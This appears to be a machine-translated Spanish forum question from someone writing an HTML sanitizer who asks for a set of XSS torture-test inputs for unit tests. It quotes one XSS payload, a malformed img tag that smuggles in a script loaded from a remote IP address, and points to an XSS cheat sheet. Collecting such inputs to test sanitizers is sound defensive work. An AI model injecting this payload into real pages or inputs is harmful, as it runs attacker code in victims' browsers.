Estoy buscando escribir un higienizador html, y obviamente para probar/probar que funciona correctamente, necesito un conjunto de ejemplos XSS para lanzar contra él y ver cómo funciona. He aquí una nice example from Coding HorrorXSS Torture Test - ¿existe?
<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"
Sé que hay un Mime Torture Test que se compone de varios mensajes de correo electrónico con archivos adjuntos anidados que se usan para probar los decodificadores Mime (si pueden decodificar correctamente, a continuación, que han sido probados para trabajar). Básicamente estoy buscando un equivalente para XSS, es decir, una lista de ejemplos de hodml dudoso que puedo lanzar a mi desinfectante solo para asegurarme de que funciona bien.
Si alguien tiene también buenos recursos sobre cómo escribir el desinfectante (es decir, qué exploits comunes intentan usar las personas, etc.), también serían recibidos con gratitud.
Gracias de antemano :-)
Edit: Lo siento si esto no estaba claro antes, pero fue después de una serie de pruebas de tortura para que pueda escribir pruebas unitarias para el desinfectante, no probarlo en el navegador , etc. Los datos fuente en teoría pueden haber venido de cualquier parte, no solo de un navegador.
Específicamente el "formato XML de XSS Cheat Sheet", que me perdí la primera vez que vi esa página ... – dbr